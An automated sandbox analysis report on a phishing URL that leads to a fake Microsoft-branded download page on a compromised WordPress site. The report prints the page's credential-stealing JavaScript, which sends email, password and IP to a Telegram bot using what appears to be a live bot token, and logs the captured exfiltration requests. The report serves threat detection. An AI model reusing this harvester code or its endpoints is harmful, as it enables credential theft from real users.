Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://savory-sweet-felidae-psrnd.glitch.me/

Overview

General Information

Sample URL:https://savory-sweet-felidae-psrnd.glitch.me/
Analysis ID:1591150
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
Javascript checks online IP of machine

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,1981881385979211426,8084460944875189349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://savory-sweet-felidae-psrnd.glitch.me/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_41JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    2.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:22:40.226205+010018100071Potentially Bad Traffic192.168.2.649831149.154.167.220443TCP
        2025-01-14T18:22:41.221243+010018100071Potentially Bad Traffic192.168.2.649839149.154.167.220443TCP
        2025-01-14T18:22:52.267650+010018100071Potentially Bad Traffic192.168.2.649911149.154.167.220443TCP
        2025-01-14T18:22:53.230796+010018100071Potentially Bad Traffic192.168.2.649918149.154.167.220443TCP
        2025-01-14T18:23:07.484471+010018100071Potentially Bad Traffic192.168.2.650004149.154.167.220443TCP
        2025-01-14T18:23:08.458487+010018100071Potentially Bad Traffic192.168.2.650006149.154.167.220443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        AI detected phishing page
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The provided URL 'www.nordicplow.com' does not match the legitimate domain for Microsoft., The URL 'nordicplow.com' does not have any known association with Microsoft., The presence of input fields for email and password on a non-Microsoft domain is suspicious and indicative of a phishing attempt. DOM: 2.1.pages.csv
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The provided URL 'www.nordicplow.com' does not match the legitimate domain for Microsoft., The URL 'nordicplow.com' does not contain any elements that suggest a connection to Microsoft., The presence of a different domain name suggests a potential phishing attempt, especially when associated with a well-known brand like Microsoft. DOM: 2.2.pages.csv
        Yara detected HtmlPhish10
        Source: Yara matchFile source: 2.1.pages.csv, type: HTML
        Source: Yara matchFile source: 2.2.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_41, type: DROPPED
        AI detected landing page (webpage, office document or email)
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlJoe Sandbox AI: Page contains button: 'Download' Source: '2.2.pages.csv'
        AI detected suspicious Javascript
        Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://www.nordicplow.com/wp-admin/includes/fotex... This script exhibits several high-risk behaviors, including data exfiltration, dynamic code execution, and redirection to a suspicious domain. It collects sensitive user information (email and password) and sends it to a Telegram bot, which is a clear indication of malicious intent. Additionally, the script attempts to bypass user interaction by simulating form submission and redirecting the user to a legitimate-looking domain. Overall, this script demonstrates a high level of risk and should be considered as a potential security threat.
        Javascript uses Telegram API
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: let attemptcount = 0; document.getelementbyid("loginform").addeventlistener("submit", function(e) { e.preventdefault(); const email = document.getelementbyid("email").value; const password = document.getelementbyid("password").value; fetch('https://api.ipify.org?format=json') .then(response => response.json()) .then(data => { const ipaddress = data.ip; const message = `***** tx40 adobe result *****\nemail: ${email}\npassword: ${password}\nip: ${ipaddress}`; const apikey = '6922366229:aah9bkiykg1yggnut2tqso3ntkvv6fyhzru'; const chatid = '6328410070'; const telegramurl = `https://api.telegram.org/bot${apikey}/sendmessage?chat_id=${chatid}&text=${encodeuricomponent(message)}`; attemptcount++; simulatesubmission(telegramurl); })...
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: Number of links: 0
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: Title: Download File does not match URL
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: Invalid link: Privacy & Cookies
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: Invalid link: Privacy & Cookies
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: let attemptcount = 0; document.getelementbyid("loginform").addeventlistener("submit", function(e) { e.preventdefault(); const email = document.getelementbyid("email").value; const password = document.getelementbyid("password").value; fetch('https://api.ipify.org?format=json') .then(response => response.json()) .then(data => { const ipaddress = data.ip; const message = `***** tx40 adobe result *****\nemail: ${email}\npassword: ${password}\nip: ${ipaddress}`; const apikey = '6922366229:aah9bkiykg1yggnut2tqso3ntkvv6fyhzru'; const chatid = '6328410070'; const telegramurl = `https://api.telegram.org/bot${apikey}/sendmessage?chat_id=${chatid}&text=${encodeuricomponent(message)}`; attemptcount++; simulatesubmission(telegramurl); })...
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: <input type="password" .../> found
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: No favicon
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: No favicon
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: No <meta name="author".. found
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: No <meta name="author".. found
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: No <meta name="copyright".. found
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: No <meta name="copyright".. found

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49839 -> 149.154.167.220:443
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49831 -> 149.154.167.220:443
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49911 -> 149.154.167.220:443
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49918 -> 149.154.167.220:443
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50006 -> 149.154.167.220:443
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50004 -> 149.154.167.220:443
        Uses the Telegram API (likely for C&C communication)
        Source: unknownDNS query: name: api.telegram.org
        Source: unknownDNS query: name: api.telegram.org
        Source: unknownDNS query: name: api.telegram.org
        Source: unknownDNS query: name: api.telegram.org
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: savory-sweet-felidae-psrnd.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-admin/includes/fotex.html HTTP/1.1Host: www.nordicplow.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://savory-sweet-felidae-psrnd.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.nordicplow.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.nordicplow.com/wp-admin/includes/fotex.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1Host: www.nordicplow.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.nordicplow.com/wp-admin/includes/fotex.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1Host: www.nordicplow.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.nordicplow.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.nordicplow.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.nordicplow.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.nordicplow.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.nordicplow.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.nordicplow.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: savory-sweet-felidae-psrnd.glitch.me
        Source: global trafficDNS traffic detected: DNS query: www.nordicplow.com
        Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
        Source: chromecache_41.3.drString found in binary or memory: https://api.ipify.org?format=json
        Source: chromecache_41.3.drString found in binary or memory: https://api.telegram.org/bot$
        Source: chromecache_41.3.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg
        Source: chromecache_41.3.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg
        Source: chromecache_44.3.drString found in binary or memory: https://www.fikox.com/
        Source: chromecache_44.3.drString found in binary or memory: https://www.nordicplow.com/wp-admin/includes/fotex.html
        Source: chromecache_41.3.drString found in binary or memory: https://www.office.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: classification engineClassification label: mal80.phis.troj.win@17/21@20/9
